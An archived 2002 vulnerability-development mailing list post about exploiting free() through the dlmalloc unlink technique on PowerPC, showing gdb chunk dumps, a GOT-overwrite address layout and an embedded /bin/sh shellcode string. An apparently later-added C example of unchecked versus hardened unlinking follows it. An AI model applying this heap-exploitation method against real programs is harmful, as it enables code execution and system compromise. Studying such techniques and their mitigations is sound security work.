Vulnerability Development mailing list archives

Re: Regex or Progress? Whose fault? - How to exploit free()


From: KF <dotslash () snosoft com>
Date: Mon, 25 Mar 2002 12:20:54 -0500

3APA3A wrote:

Dear KF,

free() failed because it was a heap overflow before free() was called and
the memory chunk was overwritten by your data ("AAA..."). So the bug is
definitely NOT in regexp, but in progress itself, because the overflow was
before the destructor was ever called. This kind of overflow may be
exploitable.

While we are on the subject of free() ... can someone explain to me why a series of jmps need to be placed in front of the shellcode during an attempt to use the "unlink macro" to execute shellcode. Here are my notes from attempting to exploit free() on a powerpc box. Here's a snapshot of the chunk I would use to take advantage of a test program.
       Starting program: /root/./freeme
       chunk is at 0x100107d8
       Program received signal SIGSEGV, Segmentation fault.
       0xff3ae04 in free () from /lib/libc.so.6
       (gdb) x/10a 0x100107d8
       0x100107d8:     0xfffffff0      0x8     0x41414141      0x42424242
                       <prev_size>     <size>  <fd  or data>   <bk  or data>
       0x100107e8:     0x0     0x0     0x43434340      0x44444444
                                       <return>        <shellcode>

As I understand free() exploitation (I could be wrong as I am learning)... In the areas represented above by 0x41414141 0x42424242 and 0x44444444 I should place the address of my shellcode. In the area noted as 0x43434340 I need to place the address of the GOT table entry I want to change minus 12 (on ppc. -4 on intel?).
[root@ibook root]# objdump -R freeme  | grep exit
100108c0 R_PPC_JMP_SLOT    exit

So when I put all that together and test it with the sample program I come up with the following.
(gdb) r
Starting program: /root/./freeme
chunk is at 0x10010910
shellcode is  at 0x7ffff7e8
address written

Program received signal SIGILL, Illegal instruction.
0x100108c0 in exit ()
(gdb) x/10a 0x100108c0
0x100108c0 <exit>:      0x7ffff7e8      0x4bffffa4      0x4bf2a3e4      0x4bffff9c
0x100108d0 <free+8>:    0x0     0x0     0x0     0x0
0x100108e0 <free+24>:   0x0     0x0
(gdb) x/10s  0x7ffff7e8
0x7ffff7e8:
"8`\00178c?o^\020\001\b?\177A`\036pDy"y"\002|?*x@\202y"i'\177e`\002&;y"\00108\177?o^\220ay"?\220?y"u"8\201y"?;A`\001`\177A`.pDy"y"\002/bin/sh"

As you can see the first address in exit() now points to my shellcode located at 0x7ffff7e8... and my shellcode is definitely there. However I just get a SIGILL. I assume this is due to the fact that I need some jmps before my shellcode.... Can someone shed some light on this for me? Also who knows the equivalent of a "short jmp" on ppc hardware. -KF
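As an added example (not KF's code and not taken from any real allocator), here is a toy model of the unlink step that the chunk dump above relies on, placed beside the "safe unlinking" consistency check that later glibc releases added to refuse exactly this kind of overwritten fd/bk pair. The chunk struct, make_list and the target stand-in are constructed for the demonstration; the chunks live on the stack and no real heap is touched.

```c
/* Toy model of the dlmalloc unlink step; added example, not the poster's code. */
#include <stddef.h>
#include <string.h>

struct chunk { size_t prev_size, size; struct chunk *fd, *bk; }; /* as in the dump */

/* Classic unchecked unlink: trusts fd/bk and writes through both of them. */
static void unlink_unchecked(struct chunk *p) {
    struct chunk *fd = p->fd, *bk = p->bk;
    fd->bk = bk;
    bk->fd = fd;
}

/* Hardened unlink: splice p out only if both neighbours still point back at it.
 * Returns 0 on success, -1 where glibc aborts with "corrupted double-linked list". */
static int unlink_checked(struct chunk *p) {
    struct chunk *fd = p->fd, *bk = p->bk;
    if (fd->bk != p || bk->fd != p)
        return -1;
    fd->bk = bk;
    bk->fd = fd;
    return 0;
}

/* Build a consistent free list a <-> p <-> b (constructed sample data). */
static void make_list(struct chunk *a, struct chunk *p, struct chunk *b) {
    memset(a, 0, sizeof *a); memset(p, 0, sizeof *p); memset(b, 0, sizeof *b);
    a->fd = p; p->bk = a; p->fd = b; b->bk = p;
}

/* Intact list: the check passes and p is removed. Returns 1 on success. */
int intact_list_accepted(void) {
    struct chunk a, p, b;
    make_list(&a, &p, &b);
    return unlink_checked(&p) == 0 && a.fd == &b && b.bk == &a;
}

/* Corrupted list: p->fd redirected outside the list (a stand-in for the
 * overwritten 0x41414141). The check refuses and leaves the target alone;
 * the old code writes p->bk into it. Returns 1 when the check catches this. */
int corrupted_fd_rejected(void) {
    struct chunk a, p, b, target;
    make_list(&a, &p, &b);
    memset(&target, 0, sizeof target);
    p.fd = &target;                       /* overwritten fd value */
    int refused = unlink_checked(&p) == -1 && target.bk == NULL;
    unlink_unchecked(&p);                 /* old behaviour: target.bk = p.bk (&a) */
    return refused && target.bk == &a;
}
```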

